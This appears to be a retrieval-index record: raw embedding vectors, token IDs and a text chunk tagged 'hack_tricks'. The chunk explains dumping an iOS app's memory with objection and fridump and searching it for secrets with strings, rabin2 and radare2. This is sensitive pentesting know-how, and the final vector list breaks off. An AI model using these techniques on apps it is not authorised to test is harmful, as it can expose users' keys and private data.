-0.8403655290603638, 0.31141865253448486, -0.12333893775939941, -0.5493823289871216, -0.1685531735420227, 0.40072861313819885, -0.2590281069278717, -0.2747320532798767, 0.02377747930586338, -0.26457464694976807, -0.042393628507852554, 0.4512229859828949, 0.393611878156662, 0.5374252200126648, 0.470347136259079, 0.23593537509441376, 0.26097333431243896, 0.4722810685634613, -0.4016978144645691, 0.5554978847503662, 0.12801595032215118, 0.04844404011964798, 0.6779760122299194, -0.13959535956382751, -0.8230524063110352, -0.09522195160388947, 0.7494648694992065, 0.481556236743927, 0.24140211939811707, 0.9278619885444641, -0.6486751437187195, 0.1006389930844307, 0.6966832876205444, -0.6540845632553101, -0.8642049431800842, 0.6816872954368591, -0.23584741353988647, 0.5469586253166199, -0.7893216609954834, 0.4688194692134857, -0.8341291546821594, 0.2844296395778656, 0.23734338581562042, 0.21288099884986877, -0.33540529012680054, -0.6317045092582703, -0.776871919631958, -0.4041438102722168, -0.21613715589046478, 0.4225873351097107, 0.004601335618644953, 0.4226362109184265, -0.6673559546470642, -1.1182881593704224, -0.9784359931945801, 0.6294010877609253, 0.4851187765598297, 0.48491981625556946, 0.12250738590955734, 0.48415133357048035, 0.916684627532959, -0.4386463761329651, 0.015561051666736603, -0.7151302099227905, 0.04381583258509636, -0.15179185569286346, 1.1140387058258057, 0.21429234743118286, 0.022954773157835007, -0.46659940481185913, -0.10186957567930222, -0.3428715169429779, -0.10666126757860184, -0.7756829261779785, -0.20283196866512299, -0.5006592273712158, -0.3954595923423767, -0.08382438868284225, -0.2981707751750946, -0.9914002418518066, -0.006924858782440424, -0.604957640171051, 0.5411553978919983, 1.0318523645401, -0.3103581964969635, -0.02049882896244526, -0.5494871735572815, -0.03983781486749649, 0.7292118668556213, 0.3743140399456024, -0.5282670855522156, -0.9596697688102722, -0.9218081831932068, -0.461452841758728, -0.11964782327413559, 0.5795962810516357, 0.5346841812133789, 0.18912801146507263, -0.9256099462509155, 0.39040789008140564, 0.6466529965400696, -0.015095082111656666, 0.5975769758224487, -0.07936200499534607, 0.34168094396591187, 0.3654860258102417, 0.4882400929927826, 0.06764524430036545, -0.1963161677122116, 0.11790156364440918, -0.6169098019599915, 0.423164427280426, -0.5740004181861877, -0.18512780964374542, 0.9195654988288879, 0.3560293912887573, -0.4114372432231903, 0.26861685514450073, -0.492737740278244, 0.9837378859519958, 0.07794751971960068, 0.5914956331253052, -0.30430224537849426, -0.37488049268722534, 0.8227007389068604, -0.3109470307826996, -0.2994956970214844, 0.3585912883281708, 0.23082977533340454, 0.07249196618795395, 0.18864163756370544, -0.8289687633514404, -0.5750934481620789, 0.5424475073814392, -0.49024897813796997, 0.7051852941513062, -0.536017119884491, 0.2656042277812958, -0.2096565067768097, -0.28678449988365173, 0.8926610350608826, 0.1268245130777359, 0.8884431719779968, -1.2491600513458252, -0.6108239889144897, 0.0124164167791605, -0.34698110818862915, 0.8946239352226257, 0.6424767374992371, 0.027232449501752853, 0.2527942359447479, 0.053073249757289886, -0.08264404535293579, -0.6335288286209106, -0.6128660440444946, -0.6627387404441833, -0.45668330788612366, 0.1969664841890335, -0.3245498538017273, 0.6493319869041443, 0.13716287910938263, -0.3496808111667633, 0.920834481716156, -0.3318649232387543, 0.05455875024199486, -0.8287421464920044, -0.3813256621360779, -0.19658750295639038, 0.7623562216758728, 0.33324408531188965, 0.2947045862674713, -0.2517157793045044, -0.3248560428619385, 0.5350555777549744, -0.2319793999195099, 0.3148643374443054, -0.23798392713069916, -0.2824747860431671, 0.48014846444129944, 1.0731472969055176, -0.27076372504234314, 0.11396250873804092, 0.46646928787231445, -0.706634521484375, -0.15778625011444092, -0.9365591406822205, -0.6498351693153381, -0.6915343999862671, -0.5118851065635681, 0.12962765991687775, -0.8272837400436401, 0.08029460906982422, -0.48853275179862976, -0.3137461841106415, -0.39757630228996277, 0.9298425316810608, 0.09482716023921967, -1.00884211063385, 0.10101697593927383, -0.32304415106773376, 0.7644079327583313, -0.40758660435676575, 0.014477095566689968, -0.8139039874076843, -0.544367790222168, -0.6055509448051453, 0.3136111795902252, -0.40652668476104736, -0.45059293508529663, -0.06721976399421692, -0.27658697962760925, 0.5269113779067993, 0.24121823906898499, -0.7563459873199463, -0.837557315826416, -0.16216380894184113, -0.30342718958854675, -0.5917279720306396, 0.00815268699079752, -0.3369859755039215, 0.6444399356842041, -0.08867442607879639, 0.07666691392660141, 0.8712171316146851, -0.6177490949630737, -0.9281730651855469, 0.5063038468360901, 0.7756248116493225, -0.8898317217826843, -0.38484641909599304, 0.30253732204437256, 0.6323418021202087, 0.6676730513572693, 0.04569779708981514, -0.7172146439552307, 0.36229729652404785, -0.015885915607213974, -1.0102750062942505, 0.22364860773086548, -0.05312790721654892, 0.49495866894721985, -0.0896109789609909, -0.9120503664016724, 0.3749580979347229, -0.023847581818699837, 0.2828900218009949, 0.4907183051109314, 0.10423161834478378, 0.31827694177627563, -0.6359139680862427, 0.5693323016166687, 0.6012454628944397, -0.017692431807518005, 0.08208702504634857, -0.25923097133636475, -0.27347099781036377, -0.31056684255599976, -0.2719440460205078, 0.2871130406856537, -1.0323745012283325, -0.2980130612850189, 0.15711991488933563, -0.06692390888929367, 0.6310431361198425, 0.030435791239142418, -0.11894345283508301, 0.07740442454814911, 0.11951369047164917, -0.38239964842796326, 0.19226433336734772, 0.18913492560386658, 0.581048309803009, -0.10068385303020477, -0.6714398860931396, -0.004448278341442347, -0.13566002249717712, -0.027971656993031502, 0.7069335579872131, 0.14954373240470886, -0.6736206412315369, 1.1194994449615479, 0.29773685336112976, -0.8478596806526184, -0.48678362369537354, -0.15681572258472443, -0.0088559715077281, 0.38785168528556824, -0.082316555082798, 0.21507816016674042, 0.4965831935405731, -0.383859246969223, 0.1563563197851181, 0.5794001817703247, -0.028851067647337914, 0.5964236855506897, -0.5861520767211914, 0.6205056309700012, -0.23621974885463715, -0.25672808289527893, 0.3314415514469147, -0.6565049290657043, -0.7470744848251343, -1.5370899438858032, 0.27559423446655273, -0.38633328676223755, -0.47468048334121704, 1.1077241897583008, 0.013474652543663979, -0.5975592732429504, 0.07123866677284241, -0.35164976119995117, 0.8095495700836182, 0.4553374946117401, 0.4100804328918457, 0.8199356198310852, 0.43880966305732727, -0.22053936123847961, 0.045001737773418427, 0.42862677574157715, 0.11732001602649689, 0.03144378960132599, -0.9940857887268066, 0.0497741661965847, -0.004612809047102928, 0.7637555599212646, -0.28061679005622864, -0.6528086066246033, -0.9137234091758728, -0.5342726111412048, -0.11835149675607681, 0.2508040964603424, -0.6018175482749939, -0.4860949218273163, -0.3156939148902893, 0.1277794986963272, -0.4376757740974426, -0.33521485328674316, -0.0822012647986412, -0.8616206645965576, 0.29012078046798706, -0.8566606044769287, 0.33435332775115967, -0.7007224559783936, -0.5257380604743958, 0.051152609288692474, -0.4605024456977844, -0.6446184515953064, -0.6370026469230652, -0.4529098570346832, -0.015551391988992691, -0.8611764907836914, 0.5827174782752991, -0.8081620931625366, -0.2851717472076416, -0.7055705785751343, 0.19045837223529816, 0.012140541337430477, 0.8629323244094849, -0.47925278544425964, 0.5556847453117371, 0.10327402502298355, 0.5764867067337036, 0.42500320076942444, -0.7592987418174744, 0.1657910943031311, 0.37990325689315796, 0.2814425528049469, -0.45165199041366577, 0.8670278787612915, -0.17055733501911163, 0.4575794041156769, 0.12113215774297714, -0.5672211050987244, 0.14085324108600616, -0.3978882431983948, 0.08803071826696396, 0.4871864318847656, -0.18300974369049072, -0.6052689552307129, -0.08298681676387787, 0.3575705289840698, 0.3201543390750885, -0.6901211738586426, 0.19901300966739655, 0.18524019420146942, 0.2620355188846588, -0.15476544201374054, -0.5139608383178711, -0.03199993818998337, 0.1365857869386673, -0.33717238903045654, -0.10770004242658615, -0.26482513546943665, 0.07717545330524445, 0.3223278522491455, -0.20436260104179382, -0.5391759872436523, -0.5729284286499023, 0.4112849235534668, -0.31101351976394653, 0.9603301286697388, 0.7497681975364685, 0.08486038446426392, 0.5810809135437012, -1.0198750495910645, -0.01255965419113636, -0.5951882004737854, -0.17097647488117218, 0.5712560415267944, 0.18158963322639465, -0.4902816116809845, -0.22639304399490356, 0.008737395517528057, 0.3230632543563843, -0.03120109811425209, 0.11051002144813538, 0.10459087789058685, 0.13914133608341217, 0.051330357789993286, 0.6152305006980896, -0.2710735499858856, -0.0530468113720417, -0.43646225333213806, 0.31368231773376465, -0.3529696464538574, -0.771855890750885, 0.4374697208404541, 0.7295255661010742, -0.14392727613449097, -0.03927242010831833, -0.273764431476593, -0.0793473944067955, 0.7641502022743225, 0.23975984752178192, 0.6506589651107788, 0.16616281867027283, -1.0810743570327759, 1.184841513633728, 0.04483788460493088, 0.6294469237327576, -0.020932968705892563, 0.4581092596054077, 0.14533406496047974, -0.02470344305038452, -0.32519179582595825, -0.498029887676239, 0.23011405766010284, 0.09987019002437592, 0.522828221321106, 0.7076418995857239, 0.7530264258384705, -0.5515029430389404, 0.20423553884029388, -0.8124576807022095, 1.0204066038131714, 0.7547231912612915, 0.10116156190633774, -0.1411518156528473, 0.2463599145412445, -0.029318349435925484, -0.3499148190021515, -0.08950236439704895, 0.593907356262207, -0.10068058222532272, -0.0018382766284048557, -0.1518009901046753, 0.28066587448120117, -0.5252199769020081, 0.5036099553108215, -0.48691537976264954, -0.1961229145526886, 0.04109087586402893, 0.3906008005142212, -0.2394731044769287, 0.4462708830833435, 1.1768680810928345, -0.4911051392555237, 0.6737411022186279, -0.011566375382244587, -0.45167598128318787, 0.11968836933374405, 0.1446283608675003, -1.3358168601989746, 0.20959977805614471, 1.0376369953155518, 0.05052020400762558, -0.10134634375572205, 0.2554972767829895, 0.34538331627845764, -0.3331950902938843, 0.3685976564884186, 0.1510423868894577, -1.187109351158142, 0.23937983810901642, -0.1301129162311554, -0.4936074912548065, -0.7874070405960083, -0.4033931493759155, 0.034686557948589325, -0.5590457320213318, 0.9106623530387878, -0.8201761245727539, 0.23158897459506989, -1.0693105459213257, 0.4590262174606323, -0.3941587805747986, 0.2927854657173157, 0.25833216309547424, -0.41028526425361633, -1.082535982131958, 0.665393590927124, -0.0898146778345108, 0.07367256283760071, -0.01906898245215416, 0.3809536099433899, 0.1798347681760788, 0.7949896454811096, 0.3183198571205139, -0.5730592608451843, -0.18669499456882477, 0.19456493854522705, 0.015035002492368221, -0.1478976458311081, 0.3678207993507385, -0.31785574555397034, 0.13411599397659302, -0.19229836761951447, -0.44092538952827454, -0.19175927340984344, 0.3199109137058258, -0.08653412014245987, -1.2394158840179443, 0.13021300733089447, 0.4344255328178406, -0.3627878725528717, 0.5200418829917908, 0.2644619047641754, 0.136220782995224, 0.22725537419319153, -0.8762533664703369, -0.11070358008146286, -0.5480220317840576, -0.46041595935821533, 0.2779127359390259, 0.9752777814865112, -0.1816490739583969, -0.08738722652196884, 0.4303959906101227, -1.0107059478759766, -0.43490880727767944, -0.1768968105316162, -0.44491222500801086, -0.091246597468853, 0.5156856775283813, -0.300750732421875, 0.9746525883674622, 0.4525098204612732, -0.1452295333147049, 0.18312634527683258, 0.3530280292034149, 0.7057210803031921, -0.7327964305877686, 0.6843683123588562, 1.1246881484985352, 0.07529494911432266, 0.6901056170463562, -0.05701959505677223, 0.6758966445922852, -0.8608136177062988, 0.1308741718530655, 0.3224989175796509, -0.15224231779575348, -1.0929605960845947, -0.2676815390586853, -0.11049314588308334, 0.6330253481864929, -0.07855599373579025, -0.04542052745819092, -0.1016601026058197, 0.20138594508171082, -0.8266858458518982, 0.18236584961414337, 0.24839240312576294, -0.032355159521102905, -0.1383623331785202, 0.33089733123779297, 0.3192080557346344, -1.6391940116882324, 4.19439172744751, 0.73250412940979, 0.17245401442050934, 0.5343018770217896, -0.29988613724708557, 0.03872831538319588, 0.9423959255218506, -0.5730206966400146, -0.021354546770453453, -0.10521010309457779, 0.18954244256019592, -0.61208176612854, 0.24067869782447815, 0.125154510140419, 0.4236712157726288, 0.4735032916069031, 0.048709020018577576, -0.034479934722185135, 0.5265868902206421, -0.8148033022880554, -0.8844683766365051, 0.4042682349681854, -0.4411608576774597, 0.9283740520477295, 0.2759675681591034, 0.42666417360305786, 0.5300418138504028, -0.6050553321838379, -0.2981266975402832, 0.2565610706806183, 0.19290557503700256, -0.6620759963989258, 0.3004380166530609, -0.17359787225723267, -0.6090763807296753, 0.4231559932231903, 0.6304015517234802, -0.5760319828987122, -0.4742332696914673, 0.23926199972629547, 0.3797764182090759, 0.19997277855873108, 0.3282967805862427, -0.2569209635257721, -0.23029135167598724, 0.878229558467865, -0.5510321259498596, 0.4572497308254242, 0.4069513976573944, -0.7162420153617859, -0.028857482597231865, -0.04485428333282471, 0.7327919006347656, -0.8750439286231995, -0.021381689235568047, 0.22038571536540985, 0.1099662035703659, -0.3443763256072998, 0.2493383139371872, -0.7307298183441162, 0.2804690897464752, -0.429338276386261, -0.2542126178741455, -0.054659903049468994, -1.0294301509857178, 0.31233829259872437, -0.21428823471069336, 0.898745059967041, -0.03583260998129845, -0.16612020134925842, -0.3046175241470337, -0.46000295877456665, -0.9021964073181152, -0.22296789288520813, 0.4897253215312958, -0.20155806839466095, -0.34131571650505066, 0.007684866897761822, 0.17977723479270935, -0.8105810880661011, -0.23997116088867188, -0.7403628826141357, -0.824023425579071, -0.5078641176223755, 0.9564692974090576, 0.6321887969970703, 0.06232992187142372, -0.6585826873779297, 0.6393250226974487, 0.24970391392707825, 0.5411905646324158, -0.3053295910358429, -0.6127236485481262, 0.21460221707820892, 0.23922422528266907 ]
[ 4531, 2073, 2003, 1996, 10200, 8250, 1012, 1996, 2880, 6207, 12653, 2097, 2393, 2017, 2000, 12453, 10200, 2015, 1997, 2115, 18059, 1010, 25249, 1010, 1998, 26322, 3543, 1012, 2320, 2017, 2031, 2179, 1996, 10200, 1997, 1996, 5080, 1006, 1013, 5198, 1013, 5828, 1012, 3235, 1013, 3075, 1013, 4646, 2490, 1013, 4684, 6508, 12273, 1013, 10200, 1013, 1063, 5080, 3593, 1065, 1007, 2017, 2064, 2707, 2559, 2005, 7591, 2592, 2478, 24665, 13699, 2005, 2742, 1010, 2030, 2478, 5906, 2066, 10047, 16103, 3070, 1007, 1012, 2000, 6709, 2065, 1037, 10200, 2003, 4372, 26775, 22571, 3064, 1010, 2017, 2064, 4638, 1996, 3145, 2315, 1000, 2003, 2368, 26775, 22571, 3064, 1000, 2013, 1996, 5371, 1000, 19676, 1012, 20228, 2923, 1000, 1010, 2284, 2012, 1996, 7117, 1997, 1996, 10200, 14176, 1012, 1996, 2206, 2742, 3065, 1037, 9563, 8131, 2008, 1996, 10200, 2003, 4372, 26775, 22571, 3064, 1024, 1026, 1029, 20950, 2544, 1027, 1000, 1015, 1012, 1014, 1000, 17181, 1027, 1000, 21183, 2546, 1011, 1022, 1000, 1029, 1028, 1026, 999, 9986, 13874, 20228, 2923, 2270, 1000, 1011, 1013, 1013, 6207, 1013, 1013, 26718, 2094, 20228, 2923, 1015, 1012, 1014, 1013, 1013, 4372, 1000, 1000, 8299, 1024, 1013, 1013, 7479, 1012, 6207, 1012, 4012, 1013, 26718, 5104, 1013, 3200, 9863, 1011, 1015, 1012, 1014, 1012, 26718, 2094, 1000, 1028, 1026, 20228, 2923, 2544, 1027, 1000, 1015, 1012, 1014, 1000, 1028, 1012, 1012, 1012, 1026, 3145, 1028, 3058, 1026, 1013, 3145, 1028, 1026, 3058, 1028, 25682, 1011, 6021, 1011, 2260, 2102, 16576, 1024, 4724, 1024, 3943, 2480, 1026, 1013, 3058, 1028, 1026, 3145, 1028, 2003, 2368, 26775, 22571, 3064, 1026, 1013, 3145, 1028, 1026, 2995, 1013, 1028, 1012, 1012, 1012, 1026, 1013, 20228, 2923, 1028, 1999, 2553, 2017, 2342, 2000, 2147, 2007, 2019, 4372, 26775, 22571, 3064, 10200, 1010, 2045, 2024, 2070, 18750, 14546, 1999, 22412, 3366, 2278, 1005, 1055, 21025, 2705, 12083, 16360, 2080, 1010, 2107, 2004, 10200, 1035, 6994, 1012, 1052, 2100, 1998, 10200, 1035, 3413, 21724, 1012, 1052, 2100, 1010, 2008, 2097, 3710, 2004, 1037, 2204, 3225, 2391, 1012, 2174, 1010, 3602, 2008, 2027, 2453, 2025, 2147, 2007, 1996, 6745, 11943, 1013, 2424, 2121, 4617, 1998, 2453, 2342, 2000, 2022, 1056, 8545, 13808, 2094, 1012, 2017, 2064, 2036, 2224, 1996, 6994, 16380, 5963, 6279, 2000, 4089, 3191, 1998, 14817, 6764, 2013, 1037, 20786, 1011, 4372, 26775, 22571, 3064, 16380, 10200, 1012, 2129, 2000, 19933, 1996, 9164, 2378, 1996, 2330, 3120, 2978, 3597, 2378, 15882, 10439, 1010, 2978, 5886, 1010, 2017, 1005, 2222, 2156, 2008, 2009, 1005, 1055, 2825, 2000, 9530, 8873, 27390, 2063, 1037, 9231, 2000, 5843, 1996, 21318, 1012, 2023, 2003, 9231, 2003, 8250, 1999, 1996, 5371, 5658, 1012, 2978, 5886, 1012, 20228, 2923, 2503, 1996, 9231, 1035, 3642, 3145, 1012, 2065, 2017, 3154, 2023, 3145, 2013, 2008, 20228, 2923, 1999, 1996, 10200, 1998, 9239, 2015, 1996, 10200, 1010, 2017, 2097, 2022, 2583, 2000, 3229, 1996, 15882, 1012, 5604, 3638, 2005, 7591, 2951, 4017, 2070, 2391, 7591, 2592, 2003, 2183, 2000, 2022, 8250, 1999, 3638, 1012, 1996, 7863, 2003, 2000, 2191, 2469, 2008, 2023, 18558, 2003, 6086, 2004, 4780, 2004, 2825, 1012, 2000, 8556, 2019, 4646 ]
hack_tricks
43.txt
17
' s memory, first create a memory dump. alternatively, you can analyze the memory in real time with, for example, a debugger. regardless of the method you use, this is a very error - prone process because dumps provide the data left by executed functions and you might miss executing critical steps. in addition, overlooking data during analysis is quite easy to do unless you know the footprint of the data you're looking for ( either its exact value or its format ). for example, if the app encrypts according to a randomly generated symmetric key, you're very unlikely to spot the key in memory unless you find its value by other means. retrieving and analyzing a memory dumpwether you are using a jailbroken or a non - jailbroken device, you can dump the app's process memory with objection and fridump. after the memory has been dumped ( e. g. to a file called " memory " ), depending on the nature of the data you're looking for, you'll need a set of different tools to process and analyze that memory dump. for instance, if you're focusing on strings, it might be sufficient for you to execute the command strings or rabin2 - zz to extract those strings. # using strings $ strings memory > strings. txt # using rabin2 $ rabin2 - zz memory > strings. txtopen strings. txt in your favorite editor and dig through it to identify sensitive information. however if you'd like to inspect other kind of data, you'd rather want to use radare2 and its search capabilities. see radare2's help on the search command ( /? ) for more information and a list of options. the following shows only a subset of them : $ r2 < name _ of _ your _ dump _ file > [ 0x00000000 ] > /? usage : / [! bf ] [ arg ] search stuff ( see'e?? search'for options ) | use io. va for searching in non virtual addressing spaces | / foo \ x00 search for string'foo \ 0'| / c [ ar ] search for crypto materials | / e / e. f / i match regular expression | / i foo search for string'foo'ignoring case | / m [? ] [ ebm ] magicfile search for magic, filesystems or binary headers | / v [ 1248 ] value look
[ 0.004190177656710148, -0.24766838550567627, 0.12771517038345337, 0.20175699889659882, -0.9488058090209961, -0.0684761330485344, -0.39442208409309387, 0.3606330454349518, 0.19718284904956818, 1.4438018798828125, 0.349774032831192, -0.21484896540641785, 0.5298157930374146, -0.7968916296958923, -0.3852231800556183, -0.2944921851158142, -0.19529813528060913, -0.10530117154121399, -0.6715904474258423, -0.23101146519184113, 0.43643972277641296, 0.10344669222831726, -1.035903811454773, -0.7271127104759216, -0.49634549021720886, 0.621077835559845, 0.8448199033737183, 0.21875931322574615, 0.3153241276741028, 0.8592795133590698, -0.022374756634235382, -0.06325630843639374, 0.06523847579956055, -0.4489864706993103, -0.019614320248365402, 0.08259327709674835, 1.1137850284576416, -0.4529719054698944, -0.19144809246063232, -0.4798116683959961, 0.2974414825439453, -0.3764072358608246, 0.4531954526901245, -0.34989017248153687, -0.7180264592170715, -0.3751061260700226, -0.03808814659714699, -0.5347820520401001, 0.29736047983169556, -0.0690082460641861, 0.34212765097618103, 0.048591386526823044, 0.7513625025749207, 0.1550208330154419, 0.218112975358963, -0.08488651365041733, 0.02687264233827591, 0.44600677490234375, -0.12547634541988373, 0.3670250475406647, 0.05404231697320938, -0.0010933009907603264, 0.1272907853126526, -0.9798651337623596, 0.2943621277809143, 0.908351480960846, 0.17898531258106232, -0.4387071132659912, -0.42469164729118347, -0.6227948069572449, -0.5147778987884521, 0.719386875629425, -0.5846605896949768, -0.39007383584976196, -0.4291258454322815, -0.13639354705810547, 0.3199440836906433, -0.1540711671113968, -0.154428631067276, 0.18048758804798126, 0.07900631427764893, 0.615994930267334, 0.13632747530937195, 0.37013575434684753, -0.04695356264710426, -0.33171674609184265, 0.13620156049728394, 0.6508141756057739, -0.07185104489326477, -0.37448158860206604, 0.0021648085676133633, 0.4485507905483246, -0.1361319124698639, -0.10408066213130951, -0.005264427978545427, 0.43401238322257996, -0.3681042790412903, 0.29056257009506226, 0.5169812440872192, -0.2644674479961395, 0.6276687979698181, 0.9129546284675598, -0.14258740842342377, 0.6439310908317566, 0.12168821692466736, 0.577449381351471, -0.21015942096710205, 0.13254918158054352, -0.1194058433175087, -0.8566328883171082, 0.25577807426452637, 0.12459738552570343, 0.3330395221710205, -0.6657677888870239, -0.5348777174949646, 0.39743223786354065, 0.2994311451911926, 0.3811885416507721, -0.376970112323761, 0.12301170825958252, -0.33612558245658875, -0.11435918509960175, 0.10278438776731491, -0.4744671881198883, 0.4029417037963867, -0.04447684437036514, 0.5662117004394531, 0.3337198793888092, -0.6344338059425354, 0.15736834704875946, -0.45643001794815063, -0.46150240302085876, -0.113524429500103, 1.1085989475250244, -0.6689133048057556, -0.1422833502292633, 0.16218924522399902, 0.5844703912734985, 0.06060471758246422, -0.7221857905387878, 0.18101494014263153, 0.14837220311164856, 0.2353476881980896, 1.0534934997558594, 0.12155859917402267, 0.11788909882307053, -0.428279846906662, -0.30270814895629883, -0.08894868195056915, 0.37209999561309814, -0.1490965038537979, -0.7548309564590454, 0.532521665096283, 0.05888187885284424, -0.34226080775260925, -0.06782262027263641, -0.90973961353302, 0.6208643913269043, -0.06486672908067703, -0.44157055020332336, -0.2830469310283661, 0.5551218390464783, -0.07664923369884491, 0.5568954944610596, -0.1722913682460785, 0.37863534688949585, -0.603025496006012, -0.3237062096595764, 0.22318555414676666, 0.04937868192791939, -0.05511121451854706, 0.0003494642151053995, -0.5250024795532227, 0.0006850154022686183, 1.1356374025344849, 0.70317542552948, 0.32262545824050903, -0.1411963701248169, 0.03741370886564255, 0.17246924340724945, -0.5803976058959961, 0.028009822592139244, -0.07886902242898941, 0.454009085893631, 0.23203039169311523, -0.009362547658383846, -0.37802445888519287, -0.18851014971733093, 0.41579216718673706, -0.2817709743976593, -0.2055654376745224, 0.9122316241264343, -0.7231218218803406, 0.29443609714508057, 0.5224643349647522, 0.18989473581314087, -1.3858014345169067, 0.0934048444032669, -0.08503870666027069, -1.3855602741241455, -0.26233577728271484, -0.061803802847862244, 0.20311251282691956, 0.6452864408493042, -0.9035853147506714, 0.5153272747993469, 0.5199728012084961, 0.8127097487449646, -0.4531647861003876, 0.5054199695587158, 0.573030412197113, 0.254925012588501, -0.37122997641563416, 0.19111159443855286, -0.11079350113868713, -0.2630147635936737, -0.1333530992269516, -0.10521594434976578, -0.06383953243494034, 0.2429913431406021, 0.15449656546115875, 0.3010583221912384, 0.5549584627151489, -0.08376743644475937, 0.28509750962257385, 0.3479013741016388, 0.21564370393753052, 0.48111090064048767, -0.014119482599198818, -0.024554137140512466, 0.14504551887512207, 0.9261204600334167, 0.21710792183876038, 0.6574031710624695, 0.17741702497005463, 0.14794611930847168, -0.13594581186771393, 0.14312313497066498, -0.15212737023830414, -0.0332641676068306, 0.07979714870452881, 0.7634455561637878, 0.2862854301929474, 0.5004621148109436, 0.45161348581314087, 0.2890948951244354, -0.03987317532300949, -0.4138001501560211, 0.08745565265417099, 0.8809624314308167, -0.3388132154941559, 0.8047528266906738, 0.49313515424728394, -0.21957184374332428, -0.5089885592460632, -0.4751489460468292, 0.23974792659282684, 0.8103125691413879, -0.2069041132926941, -0.8552009463310242, 0.0017120089614763856, 0.3829917907714844, -0.1018776148557663, -0.36115533113479614, -0.043779969215393066, 0.6605432033538818, -0.24193651974201202, 0.10464382916688919, -0.23580941557884216, -0.5745678544044495, -0.6100598573684692, -0.6812403798103333, -1.0482033491134644, -0.13461363315582275, -0.3864161968231201, 0.3070259392261505, 0.266541987657547, -1.023524522781372, -0.14652566611766815, -0.7618058323860168, -0.3835819661617279, -0.26372218132019043, 0.04857358708977699, 0.8568322062492371, 0.42751309275627136, 0.18697434663772583, -0.5290080904960632, 0.7041232585906982, -0.13415515422821045, 0.6904551386833191, -0.4869688153266907, -0.3095451593399048, -0.30685561895370483, -0.3545834720134735, 0.5348438620567322, -0.1516779363155365, 1.005026936531067, 0.18826954066753387, -0.3189116418361664, -0.21661466360092163, 0.39063262939453125, 0.31557705998420715, -0.07239926606416702, 0.11500460654497147, 0.0924135372042656, 0.7369853854179382, -0.09979937225580215, -0.21064865589141846, 0.209445983171463, 0.2978402078151703, -0.6536024808883667, 0.21002109348773956, -0.013777043670415878, 1.0187304019927979, -0.3147909939289093, 0.6791717410087585, 0.33462032675743103, -0.433494508266449, 0.08577978610992432, -0.2408072054386139, -0.185133159160614, -0.6777076721191406, -0.10337022691965103, -0.24317234754562378, -0.29760441184043884, 0.22700387239456177, -0.007546103093773127, -1.2476787567138672, 0.5487921237945557, -0.4348536431789398, -0.203798308968544, 0.10966861248016357, 0.022688932716846466, 1.0269156694412231, -0.053849391639232635, -0.15872685611248016, -0.4669867157936096, 0.06010117381811142, -0.3305318355560303, 0.39391061663627625, 0.2535293996334076, -0.7678579688072205, 0.5205385684967041, -0.04211807623505592, -0.11167630553245544, 0.3371463418006897, 0.2074936181306839, -0.29001113772392273, -0.36491310596466064, -0.11851310729980469, -0.033963967114686966, -0.05203649401664734, 0.01994592323899269, 0.7391253113746643, 0.49860548973083496, 0.6158912181854248, -0.19109143316745758, 0.2503036558628082, 0.13276904821395874, -0.24661067128181458, 0.3819231688976288, 0.03624017536640167, 0.06921663880348206, 0.43250003457069397, -0.30964037775993347, -0.5221115350723267, 0.023119891062378883, 0.30167248845100403, 0.05439583212137222, -0.14197847247123718, 0.9781704545021057, 0.17919230461120605, -0.31892767548561096, 0.3519960343837738, -0.39243221282958984, -0.37153929471969604, 1.4477322101593018, -0.15047448873519897, 0.5140798687934875, -0.9806029796600342, -0.03846808522939682, -0.16254766285419464, 0.40387123823165894, 0.19447003304958344, 0.0981646329164505, -0.27615320682525635, -0.004583753179758787, -0.2085815668106079, -0.4991508424282074, -0.2632220983505249, -0.08068511635065079, -0.05131767317652702, 0.3694920241832733, -0.4165683388710022, -0.5478694438934326, -0.8906664252281189, 0.8840155601501465, 0.9300132989883423, 0.7239462733268738, -0.014654197730123997, 0.39198458194732666, 0.3786647319793701, -0.23272204399108887, 0.5748097896575928, -0.3726179599761963, 0.18043458461761475, -0.3041551411151886, 0.4850817024707794, 0.09272737056016922, -0.16486138105392456, -0.2157609760761261, -0.1452721804380417, -0.46643489599227905, -0.42178499698638916, 0.12918461859226227, 0.07701338082551956, -0.49564191699028015, 0.0519489087164402, -0.17088842391967773, -0.2819975018501282, -0.6702496409416199, 0.10727894306182861, -0.25670698285102844, 0.10825835913419724, 0.8380185961723328, -0.7584277987480164, -0.12492090463638306, -1.0450350046157837, 0.1811191439628601, 0.418121874332428, 0.25907352566719055, -0.4664395749568939, -0.8388025164604187, -0.3911712169647217, -0.0355009026825428, -0.07999750226736069, 0.6388099193572998, 0.23968607187271118, -0.10244804620742798, -0.5151006579399109, -0.17370308935642242, 0.49890291690826416, -0.025084827095270157, -0.35052141547203064, 0.14052635431289673, 0.24696052074432373, 0.5050270557403564, 0.4859703779220581, -0.3348892033100128, 0.24091018736362457, 0.5075022578239441, -0.7095121145248413, 0.5951297879219055, -0.9125915765762329, 0.12837620079517365, 0.521086573600769, 0.4927046298980713, -0.23612314462661743, 0.38030070066452026, -0.580796480178833, 0.003841865574941039, -0.27353906631469727, -0.10047920793294907, -0.5938596129417419, -0.45942676067352295, 1.0197227001190186, -0.11384604871273041, -0.4683177173137665, 0.6776929497718811, 0.4785184860229492, -0.2894851863384247, 0.34517180919647217, -0.630432665348053, -0.5082449316978455, 0.40157949924468994, -0.7891526222229004, 0.8763619661331177, -0.05767103657126427, 0.1524997502565384, -0.5118733644485474, -0.26038363575935364, 0.7815322279930115, -0.1958209127187729, 0.16027754545211792, -0.5904527902603149, -0.6374280452728271, -0.06330706924200058, -0.011135037988424301, -0.06881316006183624, 0.3780997693538666, -0.28767022490501404, -0.24984703958034515, -0.6927329301834106, 0.19593779742717743, -0.8529413938522339, -0.5773966908454895, -0.29935160279273987, -0.5154213309288025, 0.024386372417211533, -0.5424028038978577, 0.23495568335056305, 0.04492582380771637, -0.5973899960517883, 0.2057163417339325, -0.06428295373916626, 0.1877739578485489, -0.7002676725387573, -0.6163119673728943, -0.18248119950294495, 0.2877572774887085, -0.41655638813972473, 0.2132822871208191, -0.5837095975875854, -0.28841355443000793, 0.6463736891746521, 0.1613832712173462, 0.7094938158988953, -0.8719511032104492, -0.6583889126777649, 0.9070362448692322, 0.21352282166481018, -0.3203209936618805, -0.24403776228427887, 0.2590535581111908, -0.3826286196708679, -0.043458241969347, -0.6106833815574646, -0.7937546372413635, -0.7937902212142944, -0.5483162999153137, 0.3882726728916168, -0.24876539409160614, 0.2386731654405594, -0.5322465300559998, -0.6017546057701111, -0.28231894969940186, 0.5183025598526001, 0.32616952061653137, -0.6181299686431885, 0.0927678644657135, 0.057399868965148926, -0.2531198263168335, 0.04973476752638817, 0.17891886830329895, -0.17734476923942566, -0.7930367588996887, 0.14782772958278656, 